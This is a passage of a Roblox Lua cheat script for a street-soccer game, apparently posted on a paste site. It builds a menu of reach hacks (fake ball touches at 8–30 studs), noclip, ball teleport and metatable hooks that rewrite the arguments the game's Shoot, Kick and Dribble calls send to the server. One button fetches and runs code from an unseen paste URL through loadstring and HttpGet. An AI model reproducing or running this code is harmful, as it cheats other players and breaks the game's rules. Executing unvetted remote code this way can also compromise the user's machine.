  436. getgenv().Reach = 8 -- Change to whatever you want (The game caps it)
  437. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  438. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  439. game["RunService"].Stepped:Connect(function()
  440. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  441. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  442. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  443. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  444. end
  445. end
  446. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  447. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  448. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  449. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  450. end
  451. end
  452. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  453. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  454. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  455. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  456. end
  457. end
  458. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  459. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  460. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  461. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  462. end
  463. end
  464. end)
  465. end
  466. })
  467.  
  468. Tab:AddButton({
  469. Name = "15 studs left foot",
  470. Callback = function()
  471. getgenv().Leg = "Left" -- Left or Right
  472. getgenv().Reach = 15 -- Change to whatever you want (The game caps it)
  473. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  474. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  475. game["RunService"].Stepped:Connect(function()
  476. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  477. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  478. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  479. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  480. end
  481. end
  482. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  483. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  484. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  485. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  486. end
  487. end
  488. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  489. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  490. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  491. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  492. end
  493. end
  494. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  495. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  496. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  497. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  498. end
  499. end
  500. end)
  501. end
  502. })
  503.  
  504. Tab:AddButton({
  505. Name = "30 studs left foot",
  506. Callback = function()
  507. getgenv().Leg = "Left" -- Left or Right
  508. getgenv().Reach = 30 -- Change to whatever you want (The game caps it)
  509. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  510. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  511. game["RunService"].Stepped:Connect(function()
  512. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  513. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  514. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  515. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  516. end
  517. end
  518. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  519. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  520. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  521. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  522. end
  523. end
  524. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  525. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  526. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  527. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  528. end
  529. end
  530. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  531. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  532. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  533. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  534. end
  535. end
  536. end)
  537. end
  538. })
  539.  
  540.  
  541. --misc
  542. local Tab = Window:MakeTab({
  543. Name = "misc",
  544. Icon = "rbxassetid://4483345998",
  545. PremiumOnly = false
  546. })
  547.  
  548. --antiballfling
  549. Tab:AddButton({
  550. Name = "antiballfling",
  551. Callback = function()
  552. local speaker = game.Players.LocalPlayer
  553. local RunService = game:GetService("RunService")
  554. Clip = false
  555. wait(0.1)
  556. local function NoclipLoop()
  557. if Clip == false and speaker.Character ~= nil then
  558. for _, child in pairs(speaker.Character:GetDescendants()) do
  559. if child:IsA("BasePart") and child.CanCollide == true and child.Name == "Right Leg" or child.Name == "Right Arm" or child.Name == "Left Arm" or child.Name == "Right Arm" or child.Name == "Torso" then
  560. child.CanCollide = false
  561. end
  562. end
  563. end
  564. end
  565. Noclipping = RunService.Stepped:Connect(NoclipLoop)
  566. end
  567. })
  568.  
  569. --fpsbooster
  570. Tab:AddButton({
  571. Name = "fps booster",
  572. Callback = function()
  573. local decalsyeeted = true -- Leaving this on makes games look shitty but the fps goes up by at least 20.
  574. local g = game
  575. local w = g.Workspace
  576. local l = g.Lighting
  577. local t = w.Terrain
  578. t.WaterWaveSize = 0
  579. t.WaterWaveSpeed = 0
  580. t.WaterReflectance = 0
  581. t.WaterTransparency = 0
  582. l.GlobalShadows = false
  583. l.FogEnd = 9e9
  584. l.Brightness = 0
  585. settings().Rendering.QualityLevel = "Level01"
  586. for i, v in pairs(g:GetDescendants()) do
  587. if v:IsA("Part") or v:IsA("Union") or v:IsA("CornerWedgePart") or v:IsA("TrussPart") then
  588. v.Material = "Plastic"
  589. v.Reflectance = 0
  590. elseif v:IsA("Decal") or v:IsA("Texture") and decalsyeeted then
  591. v.Transparency = 1
  592. elseif v:IsA("ParticleEmitter") or v:IsA("Trail") then
  593. v.Lifetime = NumberRange.new(0)
  594. elseif v:IsA("Explosion") then
  595. v.BlastPressure = 1
  596. v.BlastRadius = 1
  597. elseif v:IsA("Fire") or v:IsA("SpotLight") or v:IsA("Smoke") then
  598. v.Enabled = false
  599. elseif v:IsA("MeshPart") then
  600. v.Material = "Plastic"
  601. v.Reflectance = 0
  602. v.TextureID = 10385902758728957
  603. end
  604. end
  605. for i, e in pairs(l:GetChildren()) do
  606. if e:IsA("BlurEffect") or e:IsA("SunRaysEffect") or e:IsA("ColorCorrectionEffect") or e:IsA("BloomEffect") or e:IsA("DepthOfFieldEffect") then
  607. e.Enabled = false
  608. end
  609. end
  610. end
  611. })
  612.  
  613.  
  614.  
  615.  
  616. --react tab
  617. local Tab = Window:MakeTab({
  618. Name = "react settings",
  619. Icon = "rbxassetid://4483345998",
  620. PremiumOnly = false
  621. })
  622.  
  623. Tab:AddButton({
  624. Name = "nice react",
  625. Callback = function()
  626. loadstring(game:HttpGet("https://paste.ee/r/q29Pj"))()
  627. end
  628. })
  629.  
  630.  
  631. --shoot
  632. Tab:AddButton({
  633. Name = "shoot",
  634. Callback = function()
  635. _G.Vector = Vector3.new(math.huge, math.huge, math.huge)
  636.  
  637. local mt = getrawmetatable(game);
  638. local old = mt.namecall
  639. setreadonly(mt,false)
  640. mt.namecall = newcclosure(function(remote,...)
  641. args = {...}
  642. method = tostring(getnamecallmethod())
  643. if method == "FireServer" and tostring(remote) == "Shoot" then
  644. args[6] = _G.Vector
  645. return old(remote,unpack(args))
  646. end
  647. return old(remote,...)
  648. end)
  649. setreadonly(mt,true)
  650. end
  651. })
  652.  
  653. --kick
  654. Tab:AddButton({
  655. Name = "kick",
  656. Callback = function()
  657. _G.Vector = Vector3.new(math.huge, math.huge, math.huge)
  658.  
  659. local mt = getrawmetatable(game);
  660. local old = mt.namecall
  661. setreadonly(mt,false)
  662. mt.namecall = newcclosure(function(remote,...)
  663. args = {...}
  664. method = tostring(getnamecallmethod())
  665. if method == "FireServer" and tostring(remote) == "Kick" then
  666. args[6] = _G.Vector
  667. return old(remote,unpack(args))
  668. end
  669. return old(remote,...)
  670. end)
  671. setreadonly(mt,true)
  672. end
  673. })
  674.  
  675. --dribble
  676. Tab:AddButton({
  677. Name = "dribble",
  678. Callback = function()
  679. local player = game:GetService("Players").LocalPlayer
  680.  
  681. local mt = getrawmetatable(game);
  682. local old = mt.namecall
  683. setreadonly(mt,false)
  684. mt.namecall = newcclosure(function(remote,...)
  685. args = {...}
  686. method = tostring(getnamecallmethod())
  687. if method == "FireServer" and tostring(remote) == "Dribble" then
  688.  
  689.  
  690. args[2] = player.Character.Humanoid.LLCL
  691.  
  692. return old(remote,unpack(args))
  693. end
  694. return old(remote,...)
  695. end)
  696. setreadonly(mt,true)
  697. end
  698. })
  699.  
  700.  
  701. --clickk!
  702. local Tab = Window:MakeTab({
  703. Name = "click!",
  704. Icon = "rbxassetid://4483345998",
  705. PremiumOnly = false
  706. })
  707.  
  708.  
  709. Tab:AddButton({
  710. Name = "Ball TP",
  711. Callback = function()
  712. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Workspace").TPSSystem.TPS.CFrame
  713. end
  714. })
  715.  
  716. --updates
  717. local Tab = Window:MakeTab({
  718. Name = "updates",
  719. Icon = "rbxassetid://4483345998",
  720. PremiumOnly = false
  721. })
  722.  
  723. Tab:AddParagraph("19.02.2023","Maked from me")
  724. Tab:AddParagraph("25.02.2023","Added react")
  725.  
  726.  
  727. --onlyAdmin
  728. local Tab = Window:MakeTab({
  729. Name = "onlyAdmin",
  730. Icon = "rbxassetid://4483345998",
  731. PremiumOnly = false
  732. })
  733.  
  734.  
  735. OrionLib:MakeNotification({
  736. Name = "tysm",
  737. Content = "yBloodz Tps Script",
  738. Image = "rbxassetid://4483345998",
  739. Time = 5
  740. })
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement